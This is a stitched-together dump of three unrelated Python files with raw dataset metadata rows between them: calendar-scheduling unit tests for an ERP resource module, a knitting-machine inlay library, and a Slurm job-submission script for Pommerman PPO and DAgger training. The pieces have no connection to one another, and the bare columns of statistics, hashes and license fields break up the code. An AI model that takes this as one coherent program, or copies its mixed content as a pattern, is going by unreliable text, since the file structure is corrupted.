        # Result: day1 (08->09 + 12->16)
        self.assertEqual(len(intervals), 2, 'resource_calendar: wrong working interval/day computing')
        self.assertEqual(intervals[0][0], datetime.strptime('2013-02-19 08:00:00', _format), 'resource_calendar: wrong working interval / day computing')
        self.assertEqual(intervals[0][1], datetime.strptime('2013-02-19 09:00:00', _format), 'resource_calendar: wrong working interval / day computing')
        self.assertEqual(intervals[1][0], datetime.strptime('2013-02-19 12:00:00', _format), 'resource_calendar: wrong working interval / day computing')
        self.assertEqual(intervals[1][1], datetime.strptime('2013-02-19 16:00:00', _format), 'resource_calendar: wrong working interval / day computing')
        # Test: day1+14 on (resource-specific) leave, with generic leave computation only
        intervals = self.resource_calendar.get_working_intervals_of_day(
            cr, uid, self.calendar_id,
            start_dt=self.date1.replace(hour=7, minute=0, second=0) + relativedelta(days=14),
            compute_leaves=True, context=context
        )
        # Result: day1 (08->16) — the resource leave is not applied without resource_id
        self.assertEqual(len(intervals), 1, 'resource_calendar: wrong working interval/day computing')
        self.assertEqual(intervals[0][0], datetime.strptime('2013-02-26 08:00:00', _format), 'resource_calendar: wrong working interval / day computing')
        self.assertEqual(intervals[0][1], datetime.strptime('2013-02-26 16:00:00', _format), 'resource_calendar: wrong working interval / day computing')
        # Test: day1+14 on leave, with resource leave computation
        intervals = self.resource_calendar.get_working_intervals_of_day(
            cr, uid, self.calendar_id,
            start_dt=self.date1.replace(hour=7, minute=0, second=0) + relativedelta(days=14),
            compute_leaves=True,
            resource_id=self.resource1_id, context=context
        )
        # Result: nothing, because on leave
        self.assertEqual(len(intervals), 0, 'resource_calendar: wrong working interval/day computing')
def test_40_calendar_hours_scheduling(self):
    """ Testing calendar hours scheduling """
    cr, uid = self.cr, self.uid
    context = self.context
    _format = '%Y-%m-%d %H:%M:%S'
    sched_msg = 'resource_calendar: wrong hours scheduling'

    def to_dt(value):
        # Shorthand to parse the expected datetimes used in the checks below.
        return datetime.strptime(value, _format)

    def assert_intervals(result, expected):
        # expected: iterable of (index, start string, stop string) triples.
        for index, begin, stop in expected:
            self.assertEqual(result[index][0], to_dt(begin), sched_msg)
            self.assertEqual(result[index][1], to_dt(stop), sched_msg)

    def scheduled_hours(result):
        # Total scheduled time over all returned intervals, in hours.
        total = timedelta()
        for interval in result:
            total += interval[1] - interval[0]
        return seconds(total) / 3600.0

    # --------------------------------------------------
    # Test0: schedule hours backwards (old interval_min_get), done
    # without a calendar (kept for reference, not executed).
    # --------------------------------------------------
    # --------------------------------------------------
    # Test1: schedule 40 hours backwards (old interval_min_get)
    # --------------------------------------------------
    res = self.resource_calendar.schedule_hours(cr, uid, self.calendar_id, -40, day_dt=self.date1.replace(minute=0, second=0), context=context)
    assert_intervals(res, [
        # current day, limited at 09:00 because of day_dt specified -> 1 hour
        (-1, '2013-02-12 08:00:00', '2013-02-12 09:00:00'),
        # previous days: 5+7 hours / 8 hours / 5+7 hours -> 32 hours
        (-2, '2013-02-08 16:00:00', '2013-02-08 23:00:00'),
        (-3, '2013-02-08 08:00:00', '2013-02-08 13:00:00'),
        (-4, '2013-02-05 08:00:00', '2013-02-05 16:00:00'),
        (-5, '2013-02-01 16:00:00', '2013-02-01 23:00:00'),
        (-6, '2013-02-01 08:00:00', '2013-02-01 13:00:00'),
        # 7 hours remaining
        (-7, '2013-01-29 09:00:00', '2013-01-29 16:00:00'),
    ])
    # Sanity check: the intervals add up to exactly the 40 requested hours.
    self.assertEqual(scheduled_hours(res), 40.0, sched_msg)

    # --------------------------------------------------
    # Test2: schedule 40 hours forward (old interval_get)
    # --------------------------------------------------
    res = self.resource_calendar.schedule_hours(
        cr, uid, self.calendar_id, 40,
        day_dt=self.date1.replace(minute=0, second=0), context=context
    )
    assert_intervals(res, [
        (0, '2013-02-12 09:00:00', '2013-02-12 16:00:00'),
        (1, '2013-02-15 08:00:00', '2013-02-15 13:00:00'),
        (2, '2013-02-15 16:00:00', '2013-02-15 23:00:00'),
        (3, '2013-02-19 08:00:00', '2013-02-19 16:00:00'),
        (4, '2013-02-22 08:00:00', '2013-02-22 13:00:00'),
        (5, '2013-02-22 16:00:00', '2013-02-22 23:00:00'),
        (6, '2013-02-26 08:00:00', '2013-02-26 09:00:00'),
    ])
    self.assertEqual(scheduled_hours(res), 40.0, sched_msg)

    # Same scheduling, but taking the resource's leaves into account.
    res = self.resource_calendar.schedule_hours(
        cr, uid, self.calendar_id, 40,
        day_dt=self.date1.replace(minute=0, second=0),
        compute_leaves=True,
        resource_id=self.resource1_id, context=context
    )
    assert_intervals(res, [
        (0, '2013-02-12 09:00:00', '2013-02-12 16:00:00'),
        (1, '2013-02-15 08:00:00', '2013-02-15 13:00:00'),
        (2, '2013-02-15 16:00:00', '2013-02-15 23:00:00'),
        (3, '2013-02-19 08:00:00', '2013-02-19 09:00:00'),
        (4, '2013-02-19 12:00:00', '2013-02-19 16:00:00'),
        (5, '2013-02-22 08:00:00', '2013-02-22 09:00:00'),
        (6, '2013-02-22 16:00:00', '2013-02-22 23:00:00'),
        (7, '2013-03-01 11:30:00', '2013-03-01 13:00:00'),
        (8, '2013-03-01 16:00:00', '2013-03-01 22:30:00'),
    ])
    self.assertEqual(scheduled_hours(res), 40.0, sched_msg)

    # --------------------------------------------------
    # Test3: working hours (old _interval_hours_get)
    # --------------------------------------------------
    # old API: resource without leaves -> 2 weeks = 40 hours
    res = self.resource_calendar._interval_hours_get(
        cr, uid, self.calendar_id,
        self.date1.replace(hour=6, minute=0),
        self.date2.replace(hour=23, minute=0) + relativedelta(days=7),
        resource_id=self.resource1_id, exclude_leaves=True, context=context)
    self.assertEqual(res, 40.0, 'resource_calendar: wrong _interval_hours_get compatibility computation')
    # new API: resource without leaves -> 2 weeks = 40 hours
    res = self.resource_calendar.get_working_hours(
        cr, uid, self.calendar_id,
        self.date1.replace(hour=6, minute=0),
        self.date2.replace(hour=23, minute=0) + relativedelta(days=7),
        compute_leaves=False, resource_id=self.resource1_id, context=context)
    self.assertEqual(res, 40.0, 'resource_calendar: wrong get_working_hours computation')
    # old API: resource and leaves -> 40 hours - (3+4) leave hours
    res = self.resource_calendar._interval_hours_get(
        cr, uid, self.calendar_id,
        self.date1.replace(hour=6, minute=0),
        self.date2.replace(hour=23, minute=0) + relativedelta(days=7),
        resource_id=self.resource1_id, exclude_leaves=False, context=context)
    self.assertEqual(res, 33.0, 'resource_calendar: wrong _interval_hours_get compatibility computation')
    # new API: resource and leaves -> 40 hours - (3+4) leave hours
    res = self.resource_calendar.get_working_hours(
        cr, uid, self.calendar_id,
        self.date1.replace(hour=6, minute=0),
        self.date2.replace(hour=23, minute=0) + relativedelta(days=7),
        compute_leaves=True, resource_id=self.resource1_id, context=context)
    self.assertEqual(res, 33.0, 'resource_calendar: wrong get_working_hours computation')

    # --------------------------------------------------
    # Test4: misc
    # --------------------------------------------------
    # Without a calendar, fall back on default_interval (8 -> 16).
    res = self.resource_calendar.get_working_hours(
        cr, uid, None,
        self.date1.replace(hour=6, minute=0),
        self.date2.replace(hour=23, minute=0),
        compute_leaves=True, resource_id=self.resource1_id,
        default_interval=(8, 16), context=context)
    self.assertEqual(res, 32.0, 'resource_calendar: wrong get_working_hours computation')

    # Add two Monday attendances (7.5 -> 12.5 and 13 -> 14) and check the
    # hours computed over exactly that span.
    self.att0_0_id = self.resource_attendance.create(
        cr, uid, {
            'name': 'Att0',
            'dayofweek': '0',
            'hour_from': 7.5,
            'hour_to': 12.5,
            'calendar_id': self.calendar_id,
        }, context=context
    )
    self.att0_1_id = self.resource_attendance.create(
        cr, uid, {
            'name': 'Att0',
            'dayofweek': '0',
            'hour_from': 13,
            'hour_to': 14,
            'calendar_id': self.calendar_id,
        }, context=context
    )
    # 7h30 -> 12h30 = 5 hours / 13h -> 14h = 1 hour -> 6 hours total
    res = self.resource_calendar.get_working_hours(
        cr, uid, self.calendar_id,
        to_dt('2013-02-11 07:30:00'),
        to_dt('2013-02-11 14:00:00'),
        compute_leaves=False, resource_id=self.resource1_id, context=context)
    self.assertEqual(res, 6, 'resource_calendar: wrong get_working_hours computation')
def test_50_calendar_schedule_days(self):
    """ Testing calendar days scheduling """
    cr, uid = self.cr, self.uid
    _format = '%Y-%m-%d %H:%M:%S'
    # --------------------------------------------------
    # Test1: with calendar
    # --------------------------------------------------
    # Schedule 5 working days ahead of date1 -> 2013-02-26.
    # FIX: the expected-date literals previously read '00:0:00' (malformed
    # minutes field); strptime happened to accept them, normalized here.
    res = self.resource_calendar.schedule_days_get_date(cr, uid, self.calendar_id, 5, day_date=self.date1, context={'tz': 'UTC'})
    self.assertEqual(res.date(), datetime.strptime('2013-02-26 00:00:00', _format).date(), 'resource_calendar: wrong days scheduling')
    # Schedule 2 working days backwards -> 2013-02-08.
    res = self.resource_calendar.schedule_days_get_date(cr, uid, self.calendar_id, -2, day_date=self.date1, context={'tz': 'UTC'})
    self.assertEqual(res.date(), datetime.strptime('2013-02-08 00:00:00', _format).date(), 'resource_calendar: wrong days scheduling')
    # 5 working days ahead with resource leaves taken into account -> 2013-03-01.
    res = self.resource_calendar.schedule_days_get_date(
        cr, uid, self.calendar_id, 5, day_date=self.date1,
        compute_leaves=True, resource_id=self.resource1_id, context={'tz': 'UTC'})
    self.assertEqual(res.date(), datetime.strptime('2013-03-01 00:00:00', _format).date(), 'resource_calendar: wrong days scheduling')
    # --------------------------------------------------
    # Test2: misc
    # --------------------------------------------------
    # Without calendar, should only count days -> 12 -> 16, 5 days with default intervals
    res = self.resource_calendar.schedule_days_get_date(cr, uid, None, 5, day_date=self.date1, default_interval=(8, 16), context={'tz': 'UTC'})
    self.assertEqual(res, datetime.strptime('2013-02-16 16:00:00', _format), 'resource_calendar: wrong days scheduling')
def seconds(td):
    """Return the total duration of *td* as a float number of seconds.

    Replaces the hand-rolled microsecond arithmetic with the equivalent
    stdlib ``timedelta.total_seconds()`` (available since Python 2.7),
    which computes the exact same value.
    """
    assert isinstance(td, timedelta)
    return td.total_seconds()
| 70.195876
| 174
| 0.635365
| 4,553
| 34,045
| 4.638041
| 0.060839
| 0.12426
| 0.12033
| 0.101056
| 0.873846
| 0.852204
| 0.813705
| 0.781361
| 0.769617
| 0.750154
| 0
| 0.091589
| 0.190865
| 34,045
| 484
| 175
| 70.340909
| 0.674992
| 0.197063
| 0
| 0.386207
| 0
| 0
| 0.305088
| 0
| 0
| 0
| 0
| 0
| 0.42069
| 1
| 0.024138
| false
| 0
| 0.010345
| 0
| 0.041379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b845544e3b6da79ea2cd2389adbdcb6ce830ea44
| 5,383
|
py
|
Python
|
library/inlay.py
|
kausalyamahadevan/knitout-frontend-py
|
1a0414a88db698383dda7e9b45ec1293948b369b
|
[
"MIT"
] | null | null | null |
library/inlay.py
|
kausalyamahadevan/knitout-frontend-py
|
1a0414a88db698383dda7e9b45ec1293948b369b
|
[
"MIT"
] | null | null | null |
library/inlay.py
|
kausalyamahadevan/knitout-frontend-py
|
1a0414a88db698383dda7e9b45ec1293948b369b
|
[
"MIT"
] | null | null | null |
import numpy as np
import math
def inlayKnit(k,beg,end,length,cRib,cInlay,siderib='l',bed1='f',roller=400,stitch=4,speed=400):
'''can take in tuck array where 1s represent tucks and 0s represent misses
or puts tucks only at edges'''
#set beds
if bed1=='f':
bed2='b'
else:
bed2='f'
# #make tuck array
# if len(tuckarray)!=0:
# repeatSize = len(stitcharray)
# totalRepeatsHoriz=int(math.ceil(float(end-beg)/repeatSize))
# array = np.tile(stitcharray,totalRepeatsHoriz+2)
tuckarray=np.zeros(end,int)
for i in range(beg,end,5):
if i%2==0:
tuckarray[i]=1
else:
tuckarray[i]=-1
if (end)%2==0:
tuckarray[end-1]=-1
else:
tuckarray[end-1]=1
#set starting side
if siderib == 'l':
start=1
else:
start=2
length=length+1
for b in range(start,length+1):
if b%2==1:
k.rollerAdvance(roller)
k.stitchNumber(stitch)
k.speedNumber(speed)
for w in range(beg,end):
if w%2==0: #knits odds on front
k.knit('+',(bed1,w),cRib)
else:
k.knit('+',(bed2,w),cRib)
k.rollerAdvance(0)
k.stitchNumber(2)
k.speedNumber(speed)
for w in range(end-1,beg-1,-1):
if tuckarray[w]==1:
k.drop((bed2,w))
elif tuckarray[w]==-1:
k.drop((bed1,w))
for w in range(beg,end):
if tuckarray[w]==1:
k.tuck('+',(bed2,w),cInlay)
elif tuckarray[w]==-1:
k.tuck('+',(bed1,w),cInlay)
else:
k.miss('+',(bed2,w),cInlay)
else:
k.rollerAdvance(roller)
k.stitchNumber(stitch)
k.speedNumber(speed)
for w in range(end-1,beg-1,-1):
if w%2==0: #knits odds on front
k.knit('-',(bed1,w),cRib)
else:
k.knit('-',(bed2,w),cRib)
k.rollerAdvance(0)
k.stitchNumber(stitch)
k.speedNumber(speed)
for w in range(beg,end):
if tuckarray[w]==1:
k.drop((bed2,w))
elif tuckarray[w]==-1:
k.drop((bed1,w))
for w in range(end-1,beg-1,-1):
if tuckarray[w]==1:
k.tuck('-',(bed2,w),cInlay)
elif tuckarray[w]==-1:
k.tuck('-',(bed1,w),cInlay)
else:
k.miss('-',(bed2,w),cInlay)
def inlaySeed(k,beg,end,length,cRib,cInlay,inlayside='l',ribside='l',bed1='f',roller=400,stitch=4,speed=400):
    '''Knit seed-textured rows over needles [beg, end) while anchoring an
    inlay carrier with edge tucks (needles beg-1 and end) on the opposite
    bed; after every row but the last, all loops are transferred between
    beds so the knit/purl pattern alternates.'''
    bed2 = 'b' if bed1 == 'f' else 'f'
    first_row = 1 if ribside == 'l' else 2
    last_row = length + 1
    for row in range(first_row, last_row + 1):
        forward = row % 2 == 1
        heading = '+' if forward else '-'
        # The bed holding the even needles flips every row (seed texture).
        even_bed, odd_bed = (bed1, bed2) if forward else (bed2, bed1)
        needle_order = range(beg, end) if forward else range(end - 1, beg - 1, -1)

        # Knit one row in the carriage direction.
        k.rollerAdvance(roller)
        k.stitchNumber(stitch)
        k.speedNumber(speed)
        for needle in needle_order:
            k.knit(heading, (even_bed if needle % 2 == 0 else odd_bed, needle), cRib)

        # Release last row's edge tucks; drop order mirrors direction.
        k.rollerAdvance(0)
        k.stitchNumber(stitch)
        k.speedNumber(speed)
        if forward:
            k.drop((bed2, end))
            k.drop((bed2, beg - 1))
        else:
            k.drop((bed2, beg - 1))
            k.drop((bed2, end))

        # Re-anchor the inlay at both edges and flip the texture,
        # except after the very last row.  The tuck direction works out
        # to '+' exactly when the row direction matches `inlayside`.
        if row != last_row:
            if forward == (inlayside == 'l'):
                k.tuck('+', (bed2, beg - 1), cInlay)
                k.tuck('+', (bed2, end), cInlay)
            else:
                k.tuck('-', (bed2, end), cInlay)
                k.tuck('-', (bed2, beg - 1), cInlay)
            k.rollerAdvance(0)
            k.stitchNumber(2)
            k.speedNumber(100)
            for needle in range(beg, end):
                if needle % 2 == 0:
                    k.xfer((even_bed, needle), (odd_bed, needle))
                else:
                    k.xfer((odd_bed, needle), (even_bed, needle))
| 27.464286
| 109
| 0.434516
| 650
| 5,383
| 3.598462
| 0.127692
| 0.029927
| 0.025652
| 0.047029
| 0.832835
| 0.81274
| 0.782813
| 0.782813
| 0.76956
| 0.751603
| 0
| 0.045557
| 0.420955
| 5,383
| 195
| 110
| 27.605128
| 0.704844
| 0.102731
| 0
| 0.857143
| 0
| 0
| 0.007715
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014286
| false
| 0
| 0.014286
| 0
| 0.028571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8b8b7657b8682869c406095c6943dd851e5fb5d
| 146,694
|
py
|
Python
|
pommerman/research/cinjon_run_on_cluster.py
|
cinjon/playground
|
ad9ec58b2157fa6102636e7f61ef9a712c507a90
|
[
"Apache-2.0"
] | 1
|
2019-01-04T13:36:04.000Z
|
2019-01-04T13:36:04.000Z
|
pommerman/research/cinjon_run_on_cluster.py
|
cinjon/playground
|
ad9ec58b2157fa6102636e7f61ef9a712c507a90
|
[
"Apache-2.0"
] | null | null | null |
pommerman/research/cinjon_run_on_cluster.py
|
cinjon/playground
|
ad9ec58b2157fa6102636e7f61ef9a712c507a90
|
[
"Apache-2.0"
] | 1
|
2018-03-21T15:21:52.000Z
|
2018-03-21T15:21:52.000Z
|
"""Run on the cluster
NOTE: See local_config.template.py for a local_config template.
"""
import os
import sys
import itertools
import local_config
# Cluster paths and notification address come from the untracked
# local_config module (see local_config.template.py).
directory = local_config.cluster_directory
email = local_config.email

# Slurm stdout/stderr logs and generated sbatch scripts live under the
# cluster directory; create both folders on first run.
slurm_logs = os.path.join(directory, "slurm_logs")
slurm_scripts = os.path.join(directory, "slurm_scripts")
if not os.path.exists(slurm_logs):
    os.makedirs(slurm_logs)
if not os.path.exists(slurm_scripts):
    os.makedirs(slurm_scripts)

# Flag name -> short tag, used to build compact job names.
# FIX: 'num-mini-batch' was listed twice ('nmbtch' then 'nmb'); only the
# later entry ever took effect, so the dead first entry is removed — the
# resulting mapping is unchanged.
abbr = {
    'lr': 'lr',
    'board-size': 'bs',
    'how-train': 'ht-',
    'num-steps': 'ns',
    'distill-epochs': 'dstlepi',
    'num-battles-eval': 'nbe',
    'gamma': 'gma',
    'set-distill-kl': 'sdkl',
    'num-processes': 'np',
    'config': 'cfg-',
    "max-aggregate-agent-states": "maxaggr",
    'model-str': 'm-',
    'num-mini-batch': 'nmb',
    'minibatch-size': 'mbs',
    'log-interval': 'log',
    'save-interval': 'sav',
    'expert-prob': 'exprob',
    'num-steps-eval': 'nse',
    'use-value-loss': 'uvl',
    'num-episodes-dagger': 'ned',
    'use-lr-scheduler': 'ulrs',
    'half-lr-epochs': 'hlre',
    'use-gae': 'gae',
    'init-kl-factor': 'ikl',
    'state-directory-distribution': 'sdd',
    'anneal-bomb-penalty-epochs': 'abpe',
    'begin-selfbombing-epoch': 'bsbe',
    'item-reward': 'itr',
    'use-second-place': 'usp',
    'use-both-places': 'ubp',
    'mix-frozen-complex': 'mfc',
    'adapt-threshold': 'adpt',
}
def train_ppo_job(flags, jobname=None, is_fb=False, partition="uninterrupted"):
    """Generate a slurm script that runs train_ppo.py with `flags`, then
    submit it with sbatch.  Flag values are folded into the script name
    via the `abbr` tag table; `is_fb` switches between partition-based
    and qos-based submission."""
    num_processes = flags["num-processes"]
    jobname = jobname or 'pman'
    sorted_keys = sorted(flags.keys())
    # Compact, order-stable job identifier built from the abbreviated flags.
    tags = ['%s%s' % (abbr[key], str(flags[key])) for key in sorted_keys if key in abbr]
    jobnameattrs = '%s.%s' % (jobname, '.'.join(tags))
    jobcommand = "python train_ppo.py " + " ".join(
        "--%s %s" % (key, str(flags[key])) for key in sorted_keys)
    print(jobcommand)
    slurmfile = os.path.join(slurm_scripts, jobnameattrs + '.slurm')
    header = [
        "#!/bin/bash\n",
        "#SBATCH --job-name=" + jobname + "\n",
        "#SBATCH --output=%s\n" % os.path.join(slurm_logs, jobnameattrs + ".out"),
        "#SBATCH --error=%s\n" % os.path.join(slurm_logs, jobnameattrs + ".err"),
    ]
    if is_fb:
        header.append("#SBATCH --partition=%s\n" % partition)
    else:
        header.append("#SBATCH --qos=batch\n")
    header.append("#SBATCH --mail-type=END,FAIL\n")
    header.append("#SBATCH --mail-user=%s\n" % email)
    header.append("module purge\n")
    with open(slurmfile, 'w') as f:
        f.writelines(header)
        # Site-specific sbatch lines (module loads etc.) go between the
        # header and the actual command.
        local_config.write_extra_sbatch_commands(f)
        f.write(jobcommand + "\n")
    if is_fb:
        submit = "sbatch --gres=gpu:1 --nodes=1 "
    else:
        submit = "sbatch --qos batch --gres=gpu:1 --nodes=1 "
    submit += "--cpus-per-task=%s " % num_processes
    submit += "--mem=64000 --time=72:00:00 %s &" % slurmfile
    os.system(submit)
def train_dagger_job(flags, jobname=None, is_fb=False, partition="uninterrupted"):
    """Generate a slurm script that runs train_dagger.py with `flags`,
    then submit it with sbatch.  Mirrors train_ppo_job, but pins the job
    to GPU 0 via CUDA_VISIBLE_DEVICES and uses the 'pmandag' default
    job name."""
    num_processes = flags["num-processes"]
    jobname = jobname or 'pmandag'
    sorted_keys = sorted(flags.keys())
    # Compact, order-stable job identifier built from the abbreviated flags.
    tags = ['%s%s' % (abbr[key], str(flags[key])) for key in sorted_keys if key in abbr]
    jobnameattrs = '%s.%s' % (jobname, '.'.join(tags))
    jobcommand = "CUDA_VISIBLE_DEVICES=0 python train_dagger.py " + " ".join(
        "--%s %s" % (key, str(flags[key])) for key in sorted_keys)
    print(jobcommand)
    slurmfile = os.path.join(slurm_scripts, jobnameattrs + '.slurm')
    header = [
        "#!/bin/bash\n",
        "#SBATCH --job-name=" + jobname + "\n",
        "#SBATCH --output=%s\n" % os.path.join(slurm_logs, jobnameattrs + ".out"),
        "#SBATCH --error=%s\n" % os.path.join(slurm_logs, jobnameattrs + ".err"),
    ]
    if is_fb:
        header.append("#SBATCH --partition=%s\n" % partition)
    else:
        header.append("#SBATCH --qos=batch\n")
    header.append("#SBATCH --mail-type=END,FAIL\n")
    header.append("#SBATCH --mail-user=%s\n" % email)
    header.append("module purge\n")
    with open(slurmfile, 'w') as f:
        f.writelines(header)
        # Site-specific sbatch lines (module loads etc.) go between the
        # header and the actual command.
        local_config.write_extra_sbatch_commands(f)
        f.write(jobcommand + "\n")
    if is_fb:
        submit = "sbatch --gres=gpu:1 --nodes=1 "
    else:
        submit = "sbatch --qos batch --gres=gpu:1 --nodes=1 "
    submit += "--cpus-per-task=%s " % num_processes
    submit += "--mem=64000 --time=72:00:00 %s &" % slurmfile
    os.system(submit)
### These were all attempts to do KL distilling into the PPO Policy. None of them worked well.
### ... But they kinda shouldn't, because they are using the FFA one.
# train_ppo_job({
# "num-processes": 8,
# "run-name": "fresh",
# "how-train": "homogenous",
# "num-steps": 100,
# "log-interval": 150,
# "lr": 0.0003,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 2500,
# "distill-target": "dagger::/home/resnick/Code/selfplayground/thisone-dagger-save-eval-env-done-rand-seed.ht-dagger.cfg-PommeFFA-v3.m-PommeCNNPolicySmall.nc-256.lr-0.005-.mb-5000.ns-5000.num-0.epoch-580.steps-34860000.seed-0.pt",
# "restart-counts": "",
# "config": "PommeTeam-v0",
# "eval-mode": "homogenous",
# "num-battles-eval": 50,
# "gamma": ".995"
# })
# train_ppo_job({
# "num-processes": 8,
# "run-name": "fresh",
# "how-train": "homogenous",
# "num-steps": 100,
# "log-interval": 150,
# "lr": 0.0001,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 2500,
# "distill-target": "dagger::/home/resnick/Code/selfplayground/thisone-dagger-save-eval-env-done-rand-seed.ht-dagger.cfg-PommeFFA-v3.m-PommeCNNPolicySmall.nc-256.lr-0.005-.mb-5000.ns-5000.num-0.epoch-580.steps-34860000.seed-0.pt",
# "restart-counts": "",
# "config": "PommeTeam-v0",
# "eval-mode": "homogenous",
# "num-battles-eval": 50,
# "gamma": ".995"
# })
# train_ppo_job({
# "num-processes": 8,
# "run-name": "fresh",
# "how-train": "homogenous",
# "num-steps": 100,
# "log-interval": 150,
# "lr": 0.0003,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 2000,
# "distill-target": "dagger::/home/resnick/Code/selfplayground/thisone-dagger-save-eval-env-done-rand-seed.ht-dagger.cfg-PommeFFA-v3.m-PommeCNNPolicySmall.nc-256.lr-0.005-.mb-5000.ns-5000.num-0.epoch-580.steps-34860000.seed-0.pt",
# "restart-counts": "",
# "config": "PommeTeam-v0",
# "eval-mode": "homogenous",
# "num-battles-eval": 50,
# "gamma": ".995"
# })
# train_ppo_job({
# "num-processes": 8,
# "run-name": "fresh",
# "how-train": "homogenous",
# "num-steps": 100,
# "log-interval": 150,
# "lr": 0.0001,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 2000,
# "distill-target": "dagger::/home/resnick/Code/selfplayground/thisone-dagger-save-eval-env-done-rand-seed.ht-dagger.cfg-PommeFFA-v3.m-PommeCNNPolicySmall.nc-256.lr-0.005-.mb-5000.ns-5000.num-0.epoch-580.steps-34860000.seed-0.pt",
# "restart-counts": "",
# "config": "PommeTeam-v0",
# "eval-mode": "homogenous",
# "num-battles-eval": 50,
# "gamma": ".995"
# })
# train_ppo_job({
# "num-processes": 8,
# "run-name": "fresh",
# "how-train": "homogenous",
# "num-steps": 100,
# "log-interval": 150,
# "lr": 0.0003,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "set-distill-kl": 1.0,
# "distill-target": "dagger::/home/resnick/Code/selfplayground/thisone-dagger-save-eval-env-done-rand-seed.ht-dagger.cfg-PommeFFA-v3.m-PommeCNNPolicySmall.nc-256.lr-0.005-.mb-5000.ns-5000.num-0.epoch-580.steps-34860000.seed-0.pt",
# "restart-counts": "",
# "config": "PommeTeam-v0",
# "eval-mode": "homogenous",
# "num-battles-eval": 50,
# "gamma": ".995"
# })
# train_ppo_job({
# "num-processes": 8,
# "run-name": "fresh",
# "how-train": "homogenous",
# "num-steps": 100,
# "log-interval": 150,
# "lr": 0.0001,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "set-distill-kl": 1.0,
# "distill-target": "dagger::/home/resnick/Code/selfplayground/thisone-dagger-save-eval-env-done-rand-seed.ht-dagger.cfg-PommeFFA-v3.m-PommeCNNPolicySmall.nc-256.lr-0.005-.mb-5000.ns-5000.num-0.epoch-580.steps-34860000.seed-0.pt",
# "restart-counts": "",
# "config": "PommeTeam-v0",
# "eval-mode": "homogenous",
# "num-battles-eval": 50,
# "gamma": ".995"
# })
### These are trying to have PPO learn to play with a simple agent against two other simple agents. None of them worked well.
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma995", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".995", "lr": 0.0001,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma995", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma995", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0001,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma995", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".99", "lr": 0.0001,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0001,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
